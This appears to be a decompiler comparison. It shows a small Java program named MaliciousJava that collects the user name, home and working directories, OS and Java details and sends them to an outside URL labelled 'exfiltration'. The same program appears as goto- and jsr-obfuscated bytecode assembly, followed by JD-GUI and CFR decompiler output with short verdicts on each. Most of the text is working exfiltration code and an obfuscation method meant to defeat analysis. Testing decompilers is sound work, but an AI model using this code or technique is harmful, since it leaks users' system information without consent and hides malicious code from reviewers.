import java.io.*;
import java.net.*;
import javax.net.ssl.HttpsURLConnection;
public class MaliciousJava
{
public static void main (String[] args) throws Exception
{
String urlParameters =
"username=" + System.getProperty("user.name") + "&" +
"userhome=" + System.getProperty("user.home") + "&" +
"userwd=" + System.getProperty("user.dir") + "&" +
"osversion=" + System.getProperty("os.version") + "&" +
"osname=" + System.getProperty("os.name") + "&" +
"osarch=" + System.getProperty("os.arch") + "&" +
"javaver=" + System.getProperty("java.version") + "&" +
"javavend=" + System.getProperty("java.vendor");
HttpURLConnection con = (HttpURLConnection) (new URL("http://evelyn.moe/exfiltration.cfm?" + urlParameters)).openConnection();
con.setRequestMethod("GET");
con.setRequestProperty("Content-Type", "text/plain");
con.setRequestProperty("charset", "utf-8");
con.setReadTimeout(1000);
con.setInstanceFollowRedirects(true);
con.setUseCaches(false);
con.setDoInput(true);
con.connect();
con.getInputStream().read();
}
}
.version 49 0
.source MaliciousJava.java
.class super public MaliciousJava
.super java/lang/Object
.method public <init> : ()V
; method code size: 5 bytes
.limit stack 1
.limit locals 1
aload_0
invokespecial java/lang/Object <init> ()V
return
.end method
.method static public main : ([Ljava/lang/String;)V
.throws java/lang/Exception
.limit stack 4
.limit locals 4
jsr dz
return
ac:
pop
ret 3
ad:
invokevirtual java/io/InputStream read ()I
goto ac
ae:
invokevirtual java/net/HttpURLConnection getInputStream ()Ljava/io/InputStream;
goto ad
af:
aload_2
goto ae
ag:
invokevirtual java/net/HttpURLConnection connect ()V
goto af
ah:
aload_2
goto ag
ai:
invokevirtual java/net/HttpURLConnection setDoInput (Z)V
goto ah
aj:
iconst_1
goto ai
ak:
aload_2
goto aj
al:
invokevirtual java/net/HttpURLConnection setUseCaches (Z)V
goto ak
am:
iconst_0
goto al
an:
aload_2
goto am
ao:
invokevirtual java/net/HttpURLConnection setInstanceFollowRedirects (Z)V
goto an
ap:
iconst_1
goto ao
aq:
aload_2
goto ap
ar:
invokevirtual java/net/HttpURLConnection setReadTimeout (I)V
goto aq
as:
sipush 1000
goto ar
at:
aload_2
goto as
au:
invokevirtual java/net/HttpURLConnection setRequestProperty (Ljava/lang/String;Ljava/lang/String;)V
goto at
av:
ldc 'utf-8'
goto au
aw:
ldc 'charset'
goto av
ax:
aload_2
goto aw
ay:
invokevirtual java/net/HttpURLConnection setRequestProperty (Ljava/lang/String;Ljava/lang/String;)V
goto ax
az:
ldc 'text/plain'
goto ay
ba:
ldc 'Content-Type'
goto az
bb:
aload_2
goto ba
bc:
invokevirtual java/net/HttpURLConnection setRequestMethod (Ljava/lang/String;)V
goto bb
bd:
ldc 'GET'
goto bc
be:
aload_2
goto bd
bf:
astore_2
goto be
bg:
checkcast java/net/HttpURLConnection
goto bf
bh:
invokevirtual java/net/URL openConnection ()Ljava/net/URLConnection;
goto bg
bi:
invokespecial java/net/URL <init> (Ljava/lang/String;)V
goto bh
bj:
invokevirtual java/lang/StringBuilder toString ()Ljava/lang/String;
goto bi
bk:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto bj
bl:
aload_1
goto bk
bm:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto bl
bn:
ldc 'http://evelyn.moe/exfiltration.cfm?'
goto bm
bo:
invokespecial java/lang/StringBuilder <init> ()V
goto bn
bp:
dup
goto bo
bq:
new java/lang/StringBuilder
goto bp
br:
dup
goto bq
bs:
new java/net/URL
goto br
bt:
astore_1
goto bs
bu:
invokevirtual java/lang/StringBuilder toString ()Ljava/lang/String;
goto bt
bv:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto bu
bw:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto bv
bx:
ldc 'java.vendor'
goto bw
by:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto bx
bz:
ldc 'javavend='
goto by
ca:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto bz
cb:
ldc '&'
goto ca
cc:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cb
cd:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto cc
ce:
ldc 'java.version'
goto cd
cf:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto ce
cg:
ldc 'javaver='
goto cf
ch:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cg
ci:
ldc '&'
goto ch
cj:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto ci
ck:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto cj
cl:
ldc 'os.arch'
goto ck
cm:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cl
cn:
ldc 'osarch='
goto cm
co:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cn
cp:
ldc '&'
goto co
cq:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cp
cr:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto cq
cs:
ldc 'os.name'
goto cr
ct:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cs
cu:
ldc 'osname='
goto ct
cv:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cu
cw:
ldc '&'
goto cv
cx:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cw
cy:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto cx
cz:
ldc 'os.version'
goto cy
da:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto cz
db:
ldc 'osversion='
goto da
dc:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto db
dd:
ldc '&'
goto dc
de:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dd
df:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto de
dg:
ldc 'user.dir'
goto df
dh:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dg
di:
ldc 'userwd='
goto dh
dj:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto di
dk:
ldc '&'
goto dj
dl:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dk
dm:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto dl
dn:
ldc 'user.home'
goto dm
do:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dn
dp:
ldc 'userhome='
goto do
dq:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dp
dr:
ldc '&'
goto dq
ds:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto dr
dt:
invokestatic java/lang/System getProperty (Ljava/lang/String;)Ljava/lang/String;
goto ds
du:
ldc 'user.name'
goto dt
dv:
invokevirtual java/lang/StringBuilder append (Ljava/lang/String;)Ljava/lang/StringBuilder;
goto du
dw:
ldc 'username='
goto dv
dx:
invokespecial java/lang/StringBuilder <init> ()V
goto dw
dy:
dup
goto dx
dz:
astore_3
new java/lang/StringBuilder
goto dy
.end method
JD-GUI 1.4.0
JD-GUI, as usual, is terrible.
public class MaliciousJava
{
/* Error */
public static void main(String[] arg0)
throws java.lang.Exception
{
// Byte code:
// 0: jsr +542 -> 542
// 3: return
// 4: pop
// 5: ret 3
// 7: invokevirtual 61 java/io/InputStream:read ()I
// 10: goto -6 -> 4
// 13: invokevirtual 67 java/net/HttpURLConnection:getInputStream ()Ljava/io/InputStream;
// 16: goto -9 -> 7
// 19: aload_2
// 20: goto -7 -> 13
// 23: invokevirtual 70 java/net/HttpURLConnection:connect ()V
// 26: goto -7 -> 19
// 29: aload_2
// 30: goto -7 -> 23
// 33: invokevirtual 74 java/net/HttpURLConnection:setDoInput (Z)V
// 36: goto -7 -> 29
// 39: iconst_1
// 40: goto -7 -> 33
// 43: aload_2
// 44: goto -5 -> 39
// 47: invokevirtual 77 java/net/HttpURLConnection:setUseCaches (Z)V
// 50: goto -7 -> 43
// 53: iconst_0
// 54: goto -7 -> 47
// 57: aload_2
// 58: goto -5 -> 53
// 61: invokevirtual 80 java/net/HttpURLConnection:setInstanceFollowRedirects (Z)V
// 64: goto -7 -> 57
// 67: iconst_1
// 68: goto -7 -> 61
// 71: aload_2
// 72: goto -5 -> 67
// 75: invokevirtual 84 java/net/HttpURLConnection:setReadTimeout (I)V
// 78: goto -7 -> 71
// 81: sipush 1000
// 84: goto -9 -> 75
// 87: aload_2
// 88: goto -7 -> 81
// 91: invokevirtual 88 java/net/HttpURLConnection:setRequestProperty (Ljava/lang/String;Ljava/lang/String;)V
// 94: goto -7 -> 87
// 97: ldc 9
// 99: goto -8 -> 91
// 102: ldc 5
// 104: goto -7 -> 97
// 107: aload_2
// 108: goto -6 -> 102
// 111: invokevirtual 88 java/net/HttpURLConnection:setRequestProperty (Ljava/lang/String;Ljava/lang/String;)V
// 114: goto -7 -> 107
// 117: ldc 8
// 119: goto -8 -> 111
// 122: ldc 13
// 124: goto -7 -> 117
// 127: aload_2
// 128: goto -6 -> 122
// 131: invokevirtual 92 java/net/HttpURLConnection:setRequestMethod (Ljava/lang/String;)V
// 134: goto -7 -> 127
// 137: ldc 21
// 139: goto -8 -> 131
// 142: aload_2
// 143: goto -6 -> 137
// 146: astore_2
// 147: goto -5 -> 142
// 150: checkcast 63 java/net/HttpURLConnection
// 153: goto -7 -> 146
// 156: invokevirtual 98 java/net/URL:openConnection ()Ljava/net/URLConnection;
// 159: goto -9 -> 150
// 162: invokespecial 100 java/net/URL: (Ljava/lang/String;)V
// 165: goto -9 -> 156
// 168: invokevirtual 106 java/lang/StringBuilder:toString ()Ljava/lang/String;
// 171: goto -9 -> 162
// 174: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 177: goto -9 -> 168
// 180: aload_1
// 181: goto -7 -> 174
// 184: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 187: goto -7 -> 180
// 190: ldc 6
// 192: goto -8 -> 184
// 195: invokespecial 111 java/lang/StringBuilder: ()V
// 198: goto -8 -> 190
// 201: dup
// 202: goto -7 -> 195
// 205: new 102 java/lang/StringBuilder
// 208: goto -7 -> 201
// 211: dup
// 212: goto -7 -> 205
// 215: new 94 java/net/URL
// 218: goto -7 -> 211
// 221: astore_1
// 222: goto -7 -> 215
// 225: invokevirtual 106 java/lang/StringBuilder:toString ()Ljava/lang/String;
// 228: goto -7 -> 221
// 231: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 234: goto -9 -> 225
// 237: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 240: goto -9 -> 231
// 243: ldc 1
// 245: goto -8 -> 237
// 248: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 251: goto -8 -> 243
// 254: ldc 12
// 256: goto -8 -> 248
// 259: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 262: goto -8 -> 254
// 265: ldc 16
// 267: goto -8 -> 259
// 270: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 273: goto -8 -> 265
// 276: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 279: goto -9 -> 270
// 282: ldc 10
// 284: goto -8 -> 276
// 287: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 290: goto -8 -> 282
// 293: ldc 15
// 295: goto -8 -> 287
// 298: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 301: goto -8 -> 293
// 304: ldc 16
// 306: goto -8 -> 298
// 309: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 312: goto -8 -> 304
// 315: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 318: goto -9 -> 309
// 321: ldc 19
// 323: goto -8 -> 315
// 326: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 329: goto -8 -> 321
// 332: ldc 11
// 334: goto -8 -> 326
// 337: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 340: goto -8 -> 332
// 343: ldc 16
// 345: goto -8 -> 337
// 348: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 351: goto -8 -> 343
// 354: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 357: goto -9 -> 348
// 360: ldc 3
// 362: goto -8 -> 354
// 365: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 368: goto -8 -> 360
// 371: ldc 7
// 373: goto -8 -> 365
// 376: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 379: goto -8 -> 371
// 382: ldc 16
// 384: goto -8 -> 376
// 387: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 390: goto -8 -> 382
// 393: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 396: goto -9 -> 387
// 399: ldc 14
// 401: goto -8 -> 393
// 404: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 407: goto -8 -> 399
// 410: ldc 23
// 412: goto -8 -> 404
// 415: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 418: goto -8 -> 410
// 421: ldc 16
// 423: goto -8 -> 415
// 426: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 429: goto -8 -> 421
// 432: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 435: goto -9 -> 426
// 438: ldc 22
// 440: goto -8 -> 432
// 443: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 446: goto -8 -> 438
// 449: ldc 20
// 451: goto -8 -> 443
// 454: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 457: goto -8 -> 449
// 460: ldc 16
// 462: goto -8 -> 454
// 465: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 468: goto -8 -> 460
// 471: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 474: goto -9 -> 465
// 477: ldc 18
// 479: goto -8 -> 471
// 482: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 485: goto -8 -> 477
// 488: ldc 4
// 490: goto -8 -> 482
// 493: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 496: goto -8 -> 488
// 499: ldc 16
// 501: goto -8 -> 493
// 504: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 507: goto -8 -> 499
// 510: invokestatic 117 java/lang/System:getProperty (Ljava/lang/String;)Ljava/lang/String;
// 513: goto -9 -> 504
// 516: ldc 2
// 518: goto -8 -> 510
// 521: invokevirtual 110 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 524: goto -8 -> 516
// 527: ldc 17
// 529: goto -8 -> 521
// 532: invokespecial 111 java/lang/StringBuilder: ()V
// 535: goto -8 -> 527
// 538: dup
// 539: goto -7 -> 532
// 542: astore_3
// 543: new 102 java/lang/StringBuilder
// 546: goto -8 -> 538
}
}
CFR 0.119
CFR performed relatively well. The output, while syntactically incorrect, can be followed just fine.
/*
* Decompiled with CFR 0_119.
*/
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
public class MaliciousJava {
/*
* Enabled aggressive block sorting
*/
public static void main(String[] arrstring) throws Exception {
URL uRL;
StringBuilder stringBuilder;
StringBuilder stringBuilder2;
Object var3_3 = null;
stringBuilder2();
String string = stringBuilder2.append("username=").append(System.getProperty("user.name")).append("&").append("userhome=").append(System.getProperty("user.home")).append("&").append("userwd=").append(System.getProperty("user.dir")).append("&").append("osversion=").append(System.getProperty("os.version")).append("&").append("osname=").append(System.getProperty("os.name")).append("&").append("osarch=").append(System.getProperty("os.arch")).append("&").append("javaver=").append(System.getProperty("java.version")).append("&").append("javavend=").append(System.getProperty("java.vendor")).toString();
stringBuilder();
uRL(stringBuilder.append("http://evelyn.moe/exfiltration.cfm?").append(string).toString());
HttpURLConnection httpURLConnection = (HttpURLConnection)uRL.openConnection();
httpURLConnection.setRequestMethod("GET");
httpURLConnection.setRequestProperty("Content-Type", "text/plain");
httpURLConnection.setRequestProperty("charset", "utf-8");
httpURLConnection.setReadTimeout(1000);
httpURLConnection.setInstanceFollowRedirects(true);
httpURLConnection.setUseCaches(false);
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
httpURLConnection.getInputStream().read();
}
}